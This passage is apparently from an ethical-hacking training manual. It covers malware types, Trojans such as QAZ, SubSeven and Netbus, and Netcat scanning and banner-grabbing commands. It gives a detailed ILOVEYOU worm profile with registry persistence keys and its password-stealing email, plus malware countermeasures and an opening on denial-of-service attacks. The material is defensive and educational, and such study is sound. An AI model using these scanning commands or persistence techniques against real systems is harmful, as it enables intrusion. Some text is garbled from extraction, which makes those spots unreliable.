patch or simply can’t keep up with all the patches required across all their systems. The
hackers know this and take full advantage of it. The widespread malware attacks that
you hear about on the news aren’t the ones to worry about. Trojan horses, rootkits,
spyware, and other devious programs are the scary ones. These applications can do the
following:
#
#
#
#
#
#
#
#
#
List running processes and applications
Load and kill running processes and applications
Capture keystrokes
Search and copy files
Steal passwords
Edit system files
Turn on Web cams and microphones
Remotely reboot computers
Perform practically any administrative function
Bad things can happen if any of these events occurs on your network, including
confidential information being stolen, computers being taken offline, and data being
deleted
_______________________________________________________________________________________
8.2 Types of Malware____________________________
Most malware is platform-specific: It targets specific operating systems, applications,
and vulnerabilities to spread more quickly.
8.2.1 Trojan Horses
Trojan horses — named after the infamous Greek wooden horse used to penetrate the
city of Troy — are executable files, often transmitted via e-mail, that masquerade as
legitimate programs but actually perform malicious acts.
Trojan- horse code works in the background — doing things like deleting information,
gathering passwords, and capturing keystrokes — while a legitimate looking program,
such as a screen saver or game, runs in the foreground.
Many Trojans — called remote-access Trojans, or RATs — set up backdoors on the
systems they infect, allowing hackers to access them remotely and control them from
across the Internet. Many Trojans aren’t detected by antivirus programs. With all things
being equal (and antivirus software running), this is the malware you should be afraid of.
Some common RATs are NetBus,
SubSeven, and Back Orifice.
Figure: 8.1
Viruses
Computer viruses are the bescet-known malware category. Viruses are programs that
are often self-replicating — meaning that they can make copies of themselves — and
attach to executable files, deleting information and crashing computers whenever a user
or other process runs the program. Even PDA viruses exist, some of which drain
batteries and call 911 for you — how thoughtful!
Worms
Worms are self-propagating programs that travel around the Internet at lightning speed.
They load up in memory, effectively exploit known software vulnerabilities, and often
end up crashing the systems.
_______________________________________________________________________________________
Rootkits
Rootkits are nasty applications that hackers can use to control a computer completely,
with the ultimate prize of crashing the system or stealing information.
Rootkits are mostly found on UNIX systems but are becoming popular on the Windows
platform. Rootkits are sets of programs that either
Masquerade as typical administrator command-line programs
Integrate into the kernel, or core, of the operating system
Kernel-based rootkits, such as Knark for Linux and the FU rootkit for Windows, tie into
the actual operating system. With these programs, hackers can
#
#
#
#
Hide system processes and applications from the Windows Task Manager or the
process list in UNIX
Change the group membership of processes and applications so that a malicious
program can run as the system, administrator, or root account
Modify environment variables
Make programs look like they were run by another user, concealing the hacker’s
identity in audit logs
8.2.2 Spyware
Spyware programs spy on you and sometimes even capture and transmit confidential
information from your computer. They’re installed as cookies, Windows Registry entries,
and even executables on the local computer.
“Legitimate” spyware that may be installed by an administrator or other person to watch
someone’s computer usage includes SpectorSoft’s eBlaster and Spector Pro, and
TrueActive (formerly known as WinWhatWhere).
These programs are extremely powerful and capture video screen shots, turn on the
local microphone, track Web browsing, and even forward copies of e-mails sent and
received to a third-party address. Powerful and scary!
Adware is similar to spyware but a little less intrusive. It tracks Internet usage and pulls
targeted ads to specific users, based on their habits.
Built-in programming interfaces
Programming interfaces built into operating systems can be used maliciously:
Java applets are programs written in the Sun Microsystems programming
language. Although these programs run in a sandbox — or safe area — to
ensure that the local system is not compromised by malicious code, they can still
cause security problems.
_______________________________________________________________________________________
Microsoft .NET applications are programs written based on the new application
framework from Microsoft. Like Java applets, these programs have their own
playpen that helps ensure that malicious code is not executed.
ActiveX controls are Microsoft-based programs that everyone loves to hate.
ActiveX controls can be executed with minimal effort in such applications as
Internet Explorer, Outlook, and other Microsoft programs.
Their control over a computer can potentially cause serious harm to a computer
system and its stored information.
VBScripts are scaled-down versions of Microsoft’s Visual Basic programming
language. Similar to ActiveX controls, these scripts can wreak havoc on local
data.
Many of the common malware programs traversing the Internet today are
VBScripts.
Windows Script Host (WSH) is a script processor built into Windows — similar
to DOS batch files — that can be used to perform malicious acts.
JavaScript programs, which are similar to ActiveX and VBScripts, are written in
Netscape’s scripting language. They can cause computers harm if users willingly
run them within Web browsers and e-mails.
Not all applications written in these programming interfaces are malicious. Many
legitimate programs are used every day that run just fine and don’t do any harm.
8.2.3 Security tools
Your own security tools can be used against you. This includes the following tools:
Vulnerability scanners, such as Nessus and even the tried-and-true Netcat tool,
can place backdoors in your systems.
Network analyzers, including the ARP poisoning tools ettercap and dsnif
8.3 Hacking Tool: QAZ___________________________
The QAZ Trojan infects via an e-mail attachment, or spreads through IRC chat rooms.
Upon infection, the file notepad.exe is renamed to note.com, an infected version of
notepad.exe is planted, and the registry is updated to execute the Trojan when the
system boots.
Figure: 8.2
_______________________________________________________________________________________
While it runs, the Trojan listens for incoming connection on TCP port 7597, and enables
the attacker to have remote control over the infected computer.
This backdoor Trojan allows hackers to access and control an infected system.
TROJ_QAZ was initially distributed as "Notepad.exe" but might also appear with
different filenames. Once an infected file is executed, TROJ_QAZ modifies the.
Windows registry so that it becomes active every time Windows is started. TROJ_QAZ
also renames the original "notepad.exe" file to "note.com" and then copies itself as
"notepad.exe" to the Windows folder. This way, the Trojan is also launched every time a
user runs Notepad. TROJ_QAZ also attempts to spread itself to other shared drives on
local networks. This Trojan does not mass email itself out to lists in the users address
book however.
8.4 Hacking Tool: Netcat__________________________
If you only have one tool available to work with, this should be it! Commonly known as
the Swiss army knife of hacking tools, this small program can be used to accomplish
huge tasks.
The examples below only begin to touch on the utility of this tool. Once scripting has
been mastered, the auditor may begin to string together the different functions that tools
like netcat offer and automate complex tasks and produce the custom results that highend software suites promise.
nc -h [syntax help screen]
nc -v -v -z -w2 127.0.0.1 1-139 [scan tcp ports 1-139]
nc -v -v -z -w2 127.0.0.1 21 25 80 139 [scan only tcp ports 25, 60 and 139]
nc -v -v -z -w2 -n -p 53 127.0.0.1 80 [Send from Port 53, scan port 80, no name
resolution]
The nc program is illustrated below:
D:\>nc -h
[v1.10 NT]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound:
nc -l -p port [options] [hostname] [port]
options:
-d
-e prog
detach from console, stealth mode
inbound program to exec [dangerous!!]
_______________________________________________________________________________________
-g gateway
source-routing hop point[s], up to 8
-G num
source-routing pointer: 4, 8, 12, ...
-h
this cruft
-i secs
delay interval for lines sent, ports scanned
-l
listen mode, for inbound connects
-L
listen harder, re-listen on socket close
-n
numeric-only IP addresses, no DNS
-o file
hex dump of traffic
-p port
local port number
-r
-s addr
randomize local and remote ports
local source address
-t
answer TELNET negotiation
-u
UDP mode
-v
verbose [use twice to be more verbose]
-w secs
-z
timeout for connects and final net reads
zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]
Remember that -h is the only command netcat recognizes as a request for syntax help.
If netcat is run with no parameters, it will drop into interactive mode where netcat is
waiting for input.
D:\>nc -v -z -w2 127.0.0.1 1-140
www.TargetHost.net [127.0.0.1] 139 (netbios-ssn) open
www.TargetHost.net [127.0.0.1] 135 (epmap) open
www.TargetHost.net [127.0.0.1] 119 (nntp) open
www.TargetHost.net [127.0.0.1] 110 (pop3) open
www.TargetHost.net [127.0.0.1] 27 (?) open
_______________________________________________________________________________________
www.TargetHost.net [127.0.0.1] 25 (smtp) open
Finding:
Here, the parameter -v causes verbose output, while -v -v would generate even more. A
single -v will report the open ports in this case, while -v -v will also report the closed
ports.
In the example above, notice that port 135 and 139 were identified as open. This usually
indicates that the target is either a Windows system or possibly a Unix system running
Samba. Samba is used to allow Unix and Windows systems to take advantage of the
shares and resource the other offers.
D:\>nc -v -z -w2 127.0.0.1 139 80
www.TargetHost.net [127.0.0.1] 139 (netbios-ssn) open
www.TargetHost.net [127.0.0.1] 80 (http) open
Finding:
In the above example, netcat is being used to port scan just TCP ports 139 and 80. The
subsequent two lines are the findings.
D:\>nc 127.0.0.1 80 [At this point, press enter once]
HEAD / HTTP/1.0 [At this point, press enter twice]
HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Tue, 28 Aug 2001 20:35:20 GMT
Content-Type: text/html
Set-Cookie: ASPSESSIONIDGGQGQQAC=MCOBPPPDDNIHJOHJCHIKFONB; path=/
Cache-control: private
Finding:
Rather than use netcat as a port scanner in the above example, netcat is being used as
a telnet client.
An HTTP packet has been crafted to be sent to TCP port 80, which is well known as the
web server port. Just as a web browser constructs a request that will be sent to the
destination web server asking for a specific page to be returned for display, netcat can
_______________________________________________________________________________________
be used to build these same requests in as much detail as the web browser, but the
auditor controls the request.
First netcat is launched with a specific host and port specified; in this case, TCP port 80
on host 127.0.0.1. When the enter key is pressed, netcat understands who the user
wants to talk to, but not what is to be said. So netcat displays a prompt, and begins
waiting for input.
The first line refers to the type of HTTP service requested, HEAD is used to get
information about a page rather than the page itself and GET is used to retrieve the
contents of the specified page.
In this example, the syntax reads; HEAD, give information about this page, not its
contents. The lone "/" forward slash indicates that the user is asking for the default page
this web server provides when no particular page name is provided. In the following
examples, it can be seen how to specify a specific web page. Finally, we tell the web
server we are using HTTP version 1.0.
In the return report, the web servers provide several important pieces of information.
First, it indicates that this page exists (return code 200) and that the web service
software supports HTTP version 1.1 protocol. Interesting, of course, but not very useful,
yet.
Second, it identifies the web server software and version.
GET / HTTP/1.0 [At this point, press enter twice]
HTTP/1.1 200 OK
Date: Tue, 28 Aug 2001 20:34:01 GMT
Set-Cookie:
path=/
ASPSESSIONIDGGQGQQAC=KCOBPPPDHPGDIANLGHAJPCEO;
[... followed by the HTML code for the page]
_______________________________________________________________________________________
Finding:
In this example, a GET command has been issued, which returns the actual contents of
the page.
GET /Finance/home.asp HTTP/1.0 [At this point, press enter twice]
HTTP/1.1 200 OK
Date: Tue, 28 Aug 2001 20:34:31 GMT
Set-Cookie: ASPSESSIONIDGGQGQQAC=LCOBPPPDEPHHECJLAIPEJALG; path=/
Finding:
Rather than simply requesting the default page, a specific page has been asked for:
/Finance/home.asp. This can become even more involved and useful when it is realized
that anything seen in the URL address line of the web browser could be typed here and
submitted.
8.5 Hacking Tool: SubSeven______________________
SubSeven is a backdoor program that enables others to gain full access to Windows 9x
systems through network connection.
#
#
The program consists of three different components: Client (SubSeven.exe),
Server (Server.exe) and a Server configuration utility (EditServer.exe).
The client is a GUI used to connect to server through a network or internet
connection.
_______________________________________________________________________________________
Figure: 8.3
8.6 Hacking Tool: Donald Dick_____________________
Figure: 8.4
Donald Dick is a tool that enables a user to control another computer over a network. It
uses client server architecture with the server residing on the victim's computer. The
attacker uses the client to send command through TCP or SPX to the victim listening on
a predefined port. Donald Dick uses default port either 23476 or 23477
_______________________________________________________________________________________
Figure: 8.5
8.7 Hacking tool: Netbus_________________________
Figure: 8.6
_______________________________________________________________________________________
8.8 Various deadly viruses________________________
8.8.1 W32.CIH.Spacefiller (a.k.a Chernobyl)
Chernobyl is a deadly virus. Unlike the other viruses that have surfaced recently, this
one is much more than a nuisance.
#
#
If infected, Chernobyl will erase data on your hard drive, and may even keep your
machine from booting up at all.
There are several variants in the wild. Each variant activates on a different date.
Version 1.2 on April 26th, 1.3 on June 26th, and 1.4 on the 26th of every month.
8.8.2 Win32/ ExploreZip virus
ExploreZip is a Win32-based e-mail worm. It searches for Microsoft Office documents
on your hard drive and network drives.
When it finds any Word, Excel, or PowerPoint documents using the following
extensions: .doc, .xls and .ppt, it erases the contents of those files. It also emails
itself to any one who sends you an e-mail.
# ExploreZip arrives as an email attachment. The message will most likely come
from someone you know, and the body of the message will read:
"I received your email and I shall send you a reply ASAP. Till then, take a look at the
attached Zipped docs." The attachment will be named "Zipped_files.exe" and have a
WinZip icon. Double clicking the program infects your computer.
#
The
I LOVE YOU
Virus
There ain't no love
in this little bug!
If you receive email with a subject line with the phrase ILOVEYOU (all one word, no
spaces) in it… DON'T OPEN the attachment named Love-Letter-For-You.txt.vbs.
_______________________________________________________________________________________
Over a five-hour period, during May 4, 2000, this virus spread across Asia, Europe and
the United States via e-mail messages titled "ILOVEYOU." The menace clogged Web
servers, overwrote personal files and caused corporate IT managers to shut down email systems.
A scan of the Visual Basic code included in the attachment reveals that the virus may be
corrupting MP3 and JPEG files on users' hard drives, as well as MIRC, a version of
Internet Relay Chat. It also appears to reset the default start page for Internet Explorer.
This virus arrives as e-mail with the subject line "I Love You" and an attachment named
"Love-Letter-For-You.txt.vbs." Opening the attachment infects your computer. The
infection first scans your PC's memory for passwords, which are sent back to the virus's
creator (a Web site in the Philippines which has since been shut down). The infection
then replicates itself to everyone in your Outlook address book. Finally, the infection
corrupts files ending with .vbs, .vbe, .js, .css, .wsh, .sct, .hta, .jpg, .jpeg, .mp2, .mp3 by
overwriting them with a copy of itself.
You can get this bug in only one way. If you receive an email with an attachment with
the name Love-Letter-For-You.txt.vbs and you execute it, by double clicking on the
attachment, you will get infected. Don't execute it, just delete it and you will be fine.
8.8.3 How to keep from becoming infected by this bug
Of course, first and foremost, never open any email attachment that you are uncertain
of. That said, I strongly recommended that if you do not use Visual Basic scripting,
(Most Don't) you should turn this option off. To do so:
# Click your start button
# Click on Settings
# Click on Control Panel
# Double-Click on the Add/Remove Programs icon
# Click on the Windows Setup tab
# Click on Accessories to obtain the details
# Uncheck Windows Scripting Host if it is checked
# Click "ok" to save any changes
Remember, the above will only protect you from the ILOVEYOU virus, and it's variants.
Other viruses can still get to your computer.
Variations on the ILOVEYOU virus are already hitting the net. The only sure way to
protect yourself from email viruses is, DON'T OPEN ATTACHMENTS even if sent by
someone you know. See the links on the upper left of this page for more information.
_______________________________________________________________________________________
8.8.4 If you think you are infected
By now all the anti-virus companies have updates for the ILOVEYOU bug and can
detect if your computer is infected.
If your computer is infected you can delete the following files from your infected system:
#
#
#
#
#
MSKernel32.vbs in the Windows System directory
Win32DLL.vbs in the Windows directory
LOVE-LETTER-FOR-YOU.TXT.vbs in the Windows System
WinFAT32.EXE in the Internet download directory
script.ini in the MIRC directory
8.8.5 Virus Profile: VBS/Loveletter@MM
Risk Assessment
- Home Users:
Medium
- Corporate Users:
Medium
Date Discovered:
5/4/2000
Date Added:
5/4/2000
Origin:
Philippines
Length:
10,307
Type:
Virus
SubType:
VbScript
DAT Required:
4077
8.8.6 Virus Characteristics
!Note: Ensure that the extensions .VBS, .HTM are included when scanning.
As this detection covers many variants, you may experience symptoms other than those
described below.
_______________________________________________________________________________________
This is a VBScript worm with virus qualities. This worm will arrive in an email message
with this format:
Subject "ILOVEYOU"
Message "kindly checks the attached LOVELETTER coming from me."
Attachment "LOVE-LETTER-FOR-YOU.TXT.vbs"
(note that other threats use similar filenames, such as W95/MTX.gen@M which uses
the filename LOVE-LETTER-FOR-YOU.TXT.pif):
If the user runs the attachment the worm runs using the Windows Scripting Host
program. This is not normally present on Windows 95 or Windows NT unless Internet
Explorer 5 is installed.
When the worm is first run it drops copies of itself and writes an .HTM file in the
following places :
WINDOWS\SYSTEM\MSKERNEL32.VBS
WINDOWS\WIN32DLL.VBS
WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.TXT.VBS
WINDOWS\SYSTEM\LOVE-LETTER-FOR-YOU.HTM
It also adds the registry keys:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\
MSKernel32=WINDOWS\SYSTEM\MSKernel32.vbs
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\
Win32DLL=WINDOWS\Win32DLL.vbs
in order to run the worm at system startup.
This worm searches all drives connected to the host system and replaces the following
files:
*.JPG
*.JPEG
With copies of itself and it adds the extension .VBS to the original filename. So
PICT.JPG would be replaced with PICT.JPG.VBS and this would contain the worm.
The worm also overwrites the following files:
*.VBS
*.VBE
*.JS
_______________________________________________________________________________________
*.JSE
*.CSS
*.WSH
*.SCT
*.HTA
With copies of itself and renames the files to *.VBS.
This virus locates instances of the following file types:
*.MP3
*.MP2
and if found, makes them hidden and copies itself as these filenames except with .VBS
extension. For instance, if file exists as "2PAC.MP3", this now becomes a hidden file
and the virus is copied as "2PAC.MP3.VBS".
The worm creates a file 'LOVE-LETTER-FOR-YOU.HTM' which contains the worm and
this is then sent to the IRC channels if the MIRC client is installed. This is accomplished
by the worm replacing the file SCRIPT.INI.
After a short delay the worm uses Microsoft Outlook to send copies of itself to all entries
in the address book. The mails will be of the same format as the original mail.
This worm also has another trick up its sleeve in that it tries to download and install an
executable file called WIN-BUGSFIX.EXE from the Internet. This exe file is a password
stealing program that will email any cached passwords to the mail address
[email protected]
In order to facilitate this download the worm sets the start-up page of Microsoft Internet
Explorer to point to the web-page containing the password stealing Trojan.
The email sent by this program is as follows:
-------------copy of email sent----------From: [victim machine name]@[victim IP address]
To: [email protected]
Subject: Barok... email.passwords.sender.trojan
X-Mailer: Barok... email.passwords.sender.
trojan---by: spyder
Host: [machine name]
Username: [user name]
IP Address: [victim IP address]
_______________________________________________________________________________________
RAS Passwords:...[victim password info]
Cache Passwords:...[victim password info]
-------------copy of email sent----------The password stealing Trojan is also installed by the following registry key:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WINBUGSFIX
to autorun it at system startup. After it has been run the password stealing Trojan copies
itself to WINDOWS\SYSTEM\WinFAT32.EXE and replaces the registry key with
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
WinFAT32=WinFAT32.EXE
8.9 Indications of Infection________________________
Existence of files mentioned above, replacement of files as mentioned above. Email
propagation as described above. IRC file distribution as mentioned above.
8.9.1 Method of Infection
This virus will run if Windows Scripting Host is installed. Running the email attachment
received either accidentally or intentionally will install to the local system, and also to all
available drives, send via email message as an attachment and also via IRC if installed.
8.9.2 Removal Instructions
All Users:
Script, Batch, Macro and non memory-resident:
Use current engine and DAT files for detection and removal.
PE, Trojan, Internet Worm and memory resident:
Use specified engine and DAT files for detection. To remove, boot to MS-DOS mode or
use a boot diskette and use the command line scanner:
SCANPM /ADL /CLEAN /ALL
8.9.3 Additional Windows ME/XP removal considerations
Users should not trust file icons, particularly when receiving files from others via P2P
clients, IRC, email or other mediums where users can share files.
_______________________________________________________________________________________
AVERT Recommended Updates :
* Office2000 Updates
* Malformed Word
(Information/Patch)
Document
Could
Enable
Macro
to
Run
Automatically
* Scriptlet.typelib/Eyedog vulnerability patch
* Outlook as an email attachment security update
* Exchange 5.5 post SP3 Information Store Patch 5.5.2652.42 - this patch corrects
detection issues with Group Shield
It is very common for macro viruses to disable options within Office applications for
example in Word, the macro protection warning commonly is disabled. After cleaning
macro viruses, ensure that your previously set options are again enabled.
Aliases
I-Worm.Loveletter, IRC/Loveletter, Love Bug, LOVE-LET.VBS, LOVE-LETTER-FORYOU.TXT.vbs,
Loveletter,
Troj/LoveLet-A,
VBS.Loveletter.a,
VBS/LoveLet-A,
VBS/LoveLet-B,
VBS/LoveLet-C,
VBS/LoveLet-E,
VBS/Loveletter.a,
VBS/Loveletter.worm, VBS_LoveLetter, veryfunny.vbs, WIN-BUGSFIX.EXE
Variants
Virus Name
Type Sub Type Differences
VBS/Loveletter.b
Virus VbScript
Subject="Susitikim shi vakara kavos puodukui..."
VBS/Loveletter.c
Virus VbScript
Subject="FW: Joke"
Files="Very Funny.vbs","Very Funny.HTM"
VBS/Loveletter.d
Virus VbScript
Extra " -" due to editor corruption,not spreading.
VBS/Loveletter.af
Virus VbScript
First line of code is "rem FREE XXX", followed by 120 repeating
comment lines,
different file created in WINDOWS\SYSTEM\
"FREE SEXSITE PASSWORDS.HTML.vbs"
VBS/Loveletter.ah
Virus VbScript
Contains comment line:
"i am in love with Dorine de Wit",
also has minor formatting of lines
VBS/Loveletter.ag
Virus VbScript
Contains comment "rem Virusu "te iubesc""
VBS/Loveletter.ae
Virus VbScript
Insertion of additional comment lines such as:
"rem - vytvooen objektu pro pr ci se systmem soubor"
_______________________________________________________________________________________
VBS/Loveletter.ai
Virus VbScript
Subject: "You May Win $1,000,000! 1 Click Away"
Body: "kindly check the attached WIN coming from me."
Attachment: WIN.vbs
Found by Virus Patrol in newsgroup; does not contain Trojan
download code and not viable due to bad formatting.
VBS/Loveletter.be
Virus VbScript
Discovered Aug 25, 2000 - detected without update of DAT
Similar to VBS/Loveletter.c - JOKE.VBS instead of
VERYFUNNY.VBS
8.9.4 Nimda virus
Nimda is a complex virus with a mass mailing worm component which spreads itself in
attachments named README.EXE. It affects Windows 95, 98, ME, NT4 and Windows
2000 users.
Nimda is the first worm to modify existing web sites to strt offering infected files for
download. It is also the first worm to use normal end user machines to scan for
vulnerable web sites. Nimda uses the Unicode exploit to Infect IIS web server
Figure: 8.7
_______________________________________________________________________________________
8.10 How Malware Propagates
Some time back — practically forever, in computer time — most malware propagated
via floppy disks. In 1981, the first computer virus was released:
The Apple II Elk Cloner virus. In 1986, the first virus that affected the Microsoft/Intel
platform — the Brain virus — was released. Both of these viruses were floppy-disk–
based, but neither packed the punch that many viruses have come to inflict on their
victims since that time.
Automation
Automated attacks are the wave of the future for malware. The Internet is not going
away. In fact, more systems are going online — more users, more hackers, and a
greater number of applications are emerging that can be affected.
This includes Web services; peer-to-peer (P2P) software, such as instant messaging
(IM); and other file-sharing technologies, such as Gnutella, Kazaa, Morpheus, and
mobile-device applications that run on PDAs and cell phones.
E-mail
The most common malware attack channel is through e-mail. A hacker simply attaches
a virus or Trojan horse to an e-mail — often, through an automated mechanism — and
sends the message to unsuspecting users. This process is automated with selfpropagating worms making an attack even easier. The text of the e-mail says, “See the
attached note” or “Check out this game.”
Many gullible users open the attachment, thinking it’s something that will brighten up
their day. Instead, it’s malware looking to copy or delete local files and often glean email addresses from the user’s address book to send itself on to other users. If antivirus
software is missing, outdated, or disabled at the time, this can spell bad news for the
computer or network.
Hacker backdoors
Malware is propagated on computer systems by hackers compromising a host from
across the network or Internet, obtaining administrator or root access by exploiting a
known vulnerability and then installing the malware to their heart’s content. They can set
up backdoors, giving them remote access so they can come back and play in the future.
Many of these infections go unnoticed indefinitely, usually until the network administrator
suspects that something strange is going on, or the system crashes, or information gets
stolen or erased.
_______________________________________________________________________________________
Testing
You can carry out various tests to check for malware infections on your network, as
described in the following sections. Vulnerable malware ports
You should look for Trojan ports when assessing your systems. Here are some common
ones to look out:
#
#
#
31337, 54320, and 54321 (Back Orifice and Back Orifice 2000)
12345 and 12346 (NetBus)
1243 and 27374 (SubSeven)
When testing, look for computers listening on these ports. These port numbers can
usually be changed in most malware applications, so don’t rely on these completely.
Manual assessment
It helps to know your systems — what software is installed and what services are
running. Document your baseline environment, if you haven’t already, by using the
same methods I describe in this chapter.
If you suspect that one of your systems may be infected by malware, or you want to see
which applications are loaded on your system, there are tools and techniques you can
use. The key here is to search for things that just don’t look right.
Windows
Because most malware affects Windows, there are various tests specific to that platform
you can carry out to test for malware infections.
Odd file names
If you’re unsure what a specific file does or want more details on file-format and header
information, you have a couple of options for information:
#
#
Check Wotsit’s Format at www.wotsit.org for information on file formats and
headers.
Search for the filename in Google with both Web and Groups searches.
Netstat
#
#
#
Run netstat –an, at a command prompt.
The option displays all connections and listening ports.
The n option displays IP addresses and port numbers in numeric form to make
them easier to read.
_______________________________________________________________________________________
Task Manager
Press Ctrl+Alt+Del to load the Windows Task Manager and see whether any strange
applications or processes are loaded.
Many strange-looking processes are legitimate. Make sure that you know what you’re
dealing with, so you don’t stop a legitimate program. A quick Google search on the
filename usually provides enough information. Just because it’s not there doesn’t mean
it’s not loaded, though, because some processes, such as the FU rootkit for Windows,
have the ability to hide themselves.
Registry
Look in your Windows Registry under the following HKEY_LOCAL_MACHINE (HKLM)
keys for strange-looking applications that are loading. This is a common place for
malware to be initiated upon startup.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
Startup files
Check your Windows startup folder and files such as autoexec.bat and config.sys in the
root directory of the C: drive for any applications that don’t belong. Unknown programs
can signal that a rogue application is configured to start every time the computer boots.
Antivirus
The prevention against virus is to install anti-virus software and keep the updates
current.
Prominent anti-virus software vendors include:
1. Mc-Afee
2. Norton Antivirus
_______________________________________________________________________________________
3. Anti Viral Toolkit Pro
4. Dr. Solomon's
5. Trend Micro
6. Command Anti Virus
7. Data Fellows
Figure: 8.8 Virus Encyclopedia resources at Symantec
8.11 Malware Countermeasures____________________
You can implement various countermeasures to prevent malware attacks against your
systems, as described in the following sections.
General system administration
Security countermeasures within your organization can help prevent attacks:
#
Your first and foremost goal should be to keep hackers and malware out of your systems
in the first place. If you perform the other countermeasures and system-hardening best
_______________________________________________________________________________________
#
practices mentioned throughout this book and referenced in Appendix A, you’re on your
way.
Create an incident-response plan. The FedCIRC Incident Handling Checklists at
www.fedcirc.gov/incidentResponse/IHchecklists.
html is a good place to start.
No matter what measures you have in place to protect your systems from malware infections,
you’ll probably be attacked sometime. Plan ahead so you don’t have to make critical decisions
under pressure.
Before deploying network wide any programs downloaded from the Internet, test and
analyze the programs for malicious behavior on isolated systems.
# Use malware-protection software (such as antivirus, spyware protection, and Trojan
testers).
Two guidelines can increase the effectiveness of your protection:
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
Load the software on the layers of your network wherever possible, including on
firewalls, content-filtering servers, e-mail gateways/ firewalls, e-mail servers, and e-mail
clients.
Use different malware-protection applications (from multiple vendors) or a program that
combines the scanning engines of several antivirus vendors in one fell swoop, such as
Antigen from Sybari Software (www.sybari.com/home).
Apply the latest software patches — especially critical security updates.
Back up critical systems regularly. This could include performing the following:
Image or other backup that can be restored quickly in the event of a serious infection
Copies and MD5 or SHA checksums of critical executables in case you need to restore
or compare existing ones for authenticity
Emergency repair disks for critical systems in case of a malware infection
Enable heuristics protection in your antivirus software, if possible, to help detect
behavioral anomalies that need to be blocked or cleaned.
Never rely on digitally signed code — such as ActiveX controls that Internet Explorer
downloads and prompts you to load — to run properly on your systems. Digital
signatures on this code verify only that it came from a trustworthy source — not how it
actually behaves when it’s loaded.
Don’t just disable such application interfaces as ActiveX, Windows Script Host,
JavaScript, and Java without a good reason.
All these programming interfaces have some legitimate uses. Applications can stop
working if these interfaces are disabled haphazardly. If the other security controls I
mention here are in place, your systems should be pretty secure from malware written in
these languages. You want to find a good balance between security and usability for
your users so that security doesn’t get in the way of people doing their jobs.
Make sure that a firewall is always in place on your network. Use it to look for
Suspicious ports in use (or trying to be used)
Heavy traffic patterns that can signal a malware infection
Use IDS and IDP systems to stop potential malware infections in their tracks when they
try to enter your network.
_______________________________________________________________________________________
Run a rootkit-detection application:
Rkdet (vancouver-Webpages.com/rkdet) for Linux checks for someone installing a rootkit
or other malware on your systems.
Chkrootkit (www.chkrootkit.org) tests after the fact for over 50 different installed rootkits on many
popular flavors of UN
#
#
_______________________________________________________________________________________
NOTES
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
_______________________________________________________________________________________
NOTES
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
________________________________________________________________________________
_______________________________________________________________________________________
Chapter-9
Network based Attacks
Session Objectives:
Denial of Service
How DoS Works?
What Is DDoS?
Hacking Tool: Ping of Death
Tools for Running D DoS Attacks
Sniffers
Tool: Ethereal
Arp Spoofing
Sniffing Https And Ssh
Man In The Middle Attack
_______________________________________________________________________________________
9.1 DENIAL OF SERVICE_________________________
9.1.1 What is Denial of Service Attack?
Denials of service (DoS) attacks are exactly what they sound like: attempts to prevent
your server from delivering services. Attackers can do this in many ways. For example,
you could describe the Outlook e-mail worm Melissa and its ilk as DoS agents because
they cause their damage by making Outlook clients flood e-mail servers with wormladen messages to the point that the servers collapse under the load.
This is an important point. People tend to think of DoS attacks as causing havoc by
jamming network bandwidth with useless traffic. While that's certainly one kind of DoS
attack, another succeeds by devouring server resources. That means it's possible for a
successful DoS raid to be made over a low-speed modem connection if it attacks server
resources. To really protect a network against attacks, both network and servers should
be armed and ready
Usually, DoS attacks are aimed straight at your network's TCP/IP infrastructure. These
assaults come in three varieties: those that exploit weaknesses in a given TCP/IP stack
implementation; those that target TCP/IP weaknesses; and the tried and true brute force
attack.
9.2 Types of DoS Attacks_________________________
9.2.1 Ping of Death
The canonical example of an attack that goes after TCP/IP implementation weaknesses
is the Ping of Death attack. In this exploit, your enemy creates an IP packet that
exceeds the IP standard's maximum 65,536-byte size. When this bloated packet arrives
it crashes systems that are using a vulnerable TCP/IP stack and operating system.
All modern operating systems and stacks are immune to the Ping of Death attack, but
older UNIX systems may still be vulnerable.
9.2.2 Teardrop
Another attack that relies on poor TCP/IP implementation is Teardrop, which exploits
defects in the way systems reassemble IP packet fragments. On their way from hither to
yon on the Internet, an IP packet may be broken up into smaller pieces. Each of these
still has the original IP packet's header, as well as an offset field that identifies which
bytes of the original packet it contains.
_______________________________________________________________________________________
With this information, an ordinary broken packet is reassembled at its destination and
network continues uninterrupted. When a Teardrop attack hits, your server is
bombarded with IP fragments that have overlapping offset fields. If your server or router
can't disregard these fragments and attempts to reassemble them, your box will go
castors up quickly. If your systems are up-to-date, or if you have a firewall that blocks
Teardrop packets, you shouldn't have any trouble.
9.2.3 SYN Attack
Attempts to whack your system using TCP/IP weaknesses also abound. The most
popular of these is the SYN attack. SYN works by taking advantage of the protocol
